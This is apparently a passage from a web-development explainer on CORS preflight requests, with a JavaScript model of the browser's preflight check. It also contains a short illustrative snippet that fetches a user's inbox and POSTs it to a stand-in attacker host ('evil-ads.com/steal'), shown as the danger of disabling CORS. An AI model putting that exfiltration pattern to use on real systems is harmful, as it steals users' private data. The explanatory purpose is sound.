
For complex requests (e.g., those using methods other than GET/POST, or custom headers), the browser sends an OPTIONS request first (a "preflight" check). Some extensions struggle to intercept preflight requests properly. If the extension fails to inject headers during the preflight phase, the actual request will never be sent.
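The preflight decision described above, as an added example (not code from the original page): a simplified model of the browser's check, showing that headers added only to the final response never help when the OPTIONS response lacks them. The function names, the `https://app.example` origin and the sample headers are constructed for illustration; credentialed requests and the preflight status-code check are left out.

```javascript
// Simplified model of the browser's preflight decision (non-credentialed requests only).
const SAFE_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SAFE_HEADERS = new Set(['accept', 'accept-language', 'content-language', 'content-type']);
const SAFE_TYPES = new Set(['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain']);
// Names of request headers that are not CORS-safelisted.
function unsafeHeaders(req) {
  return Object.entries(req.headers || {})
    .filter(([name, value]) => {
      const n = name.toLowerCase();
      if (!SAFE_HEADERS.has(n)) return true;
      return n === 'content-type' && !SAFE_TYPES.has(value.split(';')[0].trim().toLowerCase());
    })
    .map(([name]) => name.toLowerCase());
}

// True when the browser must send OPTIONS before the real request.
function needsPreflight(req) {
  return !SAFE_METHODS.has(req.method.toUpperCase()) || unsafeHeaders(req).length > 0;
}

// Evaluate the CORS headers on the OPTIONS response.
function preflightPasses(req, origin, optionsHeaders) {
  const h = {};
  for (const [k, v] of Object.entries(optionsHeaders)) h[k.toLowerCase()] = v;
  const list = v => (v || '').split(',').map(s => s.trim().toLowerCase()).filter(Boolean);
  const allowOrigin = h['access-control-allow-origin'];
  if (allowOrigin !== '*' && allowOrigin !== origin) return false;
  const methods = list(h['access-control-allow-methods']);
  const methodOk = SAFE_METHODS.has(req.method.toUpperCase()) ||
    methods.includes('*') || methods.includes(req.method.toLowerCase());
  const allowed = list(h['access-control-allow-headers']);
  const headersOk = allowed.includes('*') || unsafeHeaders(req).every(n => allowed.includes(n));
  return methodOk && headersOk;
}

// The real request leaves the browser only if no preflight is needed or the preflight passes.
function actualRequestSent(req, origin, optionsHeaders) {
  return !needsPreflight(req) || preflightPasses(req, origin, optionsHeaders);
}
// Constructed sample data (hypothetical origin and headers).
const ORIGIN = 'https://app.example';
const putJson = { method: 'PUT', headers: { 'Content-Type': 'application/json', 'X-Request-Id': '1' } };
const INJECTED = {
  'Access-Control-Allow-Origin': '*',
  'Access-Control-Allow-Methods': 'GET, POST, PUT',
  'Access-Control-Allow-Headers': 'content-type, x-request-id',
};
console.log('OPTIONS untouched:', actualRequestSent(putJson, ORIGIN, {}));
console.log('OPTIONS patched:  ', actualRequestSent(putJson, ORIGIN, INJECTED));
```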

```javascript
fetch('https://mail.company.com/api/inbox')
  .then(response => response.text())
  .then(data => {
    // Send your entire inbox to an attacker's server
    fetch('https://evil-ads.com/steal', {
      method: 'POST',
      body: data
    });
  });
```

Disabling CORS is :